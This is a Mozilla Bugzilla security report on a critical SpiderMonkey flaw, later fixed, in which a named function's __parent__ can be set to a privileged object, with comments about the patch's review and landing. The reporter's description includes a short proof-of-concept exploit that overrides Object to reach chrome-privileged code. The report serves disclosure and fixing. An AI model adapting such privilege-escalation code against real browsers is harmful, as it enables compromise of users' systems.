Arbitrary code execution by setting fun.__parent__ to a privileged object

RESOLVED FIXED in mozilla1.9alpha1

Status

()

Core
Security
P2
normal
RESOLVED FIXED
11 years ago
9 years ago

People

(Reporter: moz_bug_r_a4, Assigned: mrbkap)

Tracking

({fixed1.8.1, verified1.8.0.5})

Trunk
mozilla1.9alpha1
fixed1.8.1, verified1.8.0.5
Points:
---
Bug Flags:
blocking1.7.14 ?
blocking1.8.0.5 +

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:critical])

Attachments

(3 attachments)

(Reporter)

Description

11 years ago
A named function created by function expression has a extra parent object that
has a property whose name is the function name.

  a = function b() {};
  a.__parent__.toSource();

  -> ({b:(function b() {})})

There is a way to set the parent object in question to a privileged object.
(I got the hint from Bug 338709.)

  Object = function() { return privileged_object; };
  a = function b() {};

Exploit:
  <marquee id="m">
  x = m.init.eval.prototype;
  x.w = window;
  Object = function() { return x; };
  var a = function b() { with (w) alert(Components.stack); };
  a.call({}); // to avoid the access check in js_ComputeThis.
(Reporter)

Comment 1

11 years ago
Created attachment 224765 [details]
testcase
(Assignee)

Comment 2

11 years ago
Created attachment 224775 [details] [diff] [review]
Fix

If anybody's relying on this behavior already, then, IMO, they'll get what they deserve.
Assignee: dveditz → mrbkap
Status: NEW → ASSIGNED
Attachment #224775 - Flags: superreview?(shaver)
(Assignee)

Updated

11 years ago
OS: Windows XP → All
Priority: -- → P2
Hardware: PC → All
Target Milestone: --- → mozilla1.9alpha
(Assignee)

Updated

11 years ago
Attachment #224775 - Flags: review?(igor.bukanov)
Comment on attachment 224775 [details] [diff] [review]
Fix

sr=shaver
Attachment #224775 - Flags: superreview?(shaver) → superreview+

Comment 4

11 years ago
Comment on attachment 224775 [details] [diff] [review]
Fix

This is an area where as I remember Rhino deviates from SpiderMonkey quite significantly. For named function expressions Rhino parser simply adds a variable initialized to the function itself avoiding an extra objects. It violates Ecma v3 since potentially user-visible  new Object is not called. But this is really the case of broken specs.
Attachment #224775 - Flags: review?(igor.bukanov) → review+
(Assignee)

Comment 5

11 years ago
Fix checked into trunk.
Status: ASSIGNED → RESOLVED
Last Resolved: 11 years ago
Resolution: --- → FIXED
(In reply to comment #4)
> (From update of attachment 224775 [details] [diff] [review] [edit])
> This is an area where as I remember Rhino deviates from SpiderMonkey quite
> significantly. For named function expressions Rhino parser simply adds a
> variable initialized to the function itself avoiding an extra objects. It
> violates Ecma v3 since potentially user-visible  new Object is not called. But
> this is really the case of broken specs.

Yes, here and in catch clause case, ECMA-262 goes off the rails.  It often (but not consistently) uses an internal constructor function that magically uses the "original Object.prototype value" as the prototype of the new object, and does not invoke the constructor function by its name.

For ES4, both cases should use lexical scope.

/be
Flags: blocking1.8.1?
Flags: blocking1.8.0.5?
Flags: blocking1.7.14?
Flags: blocking-aviary1.0.9?
Whiteboard: [sg:critical]

Updated

11 years ago
Flags: blocking1.8.0.5? → blocking1.8.0.5+

Comment 7

11 years ago
Comment on attachment 224775 [details] [diff] [review]
Fix

a=jay for checkin on the 1.8.0 branch.
Attachment #224775 - Flags: approval1.8.0.5+
(Assignee)

Comment 8

11 years ago
Fix checked into the 1.8 branches.
Keywords: fixed1.8.0.5, fixed1.8.1

Comment 9

11 years ago
v.fixed on 1.8.0 branch with Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.5) Gecko/20060619 Firefox/1.5.0.5
Keywords: fixed1.8.0.5 → verified1.8.0.5

Comment 10

11 years ago
Created attachment 232733 [details] [diff] [review]
for 1.0.x

can't remember if the original applied cleanly. This one does for sure.
Group: core-security
Flags: blocking1.8.1?
Flags: blocking-aviary1.0.9?
You need to log in before you can comment on or make changes to this bug.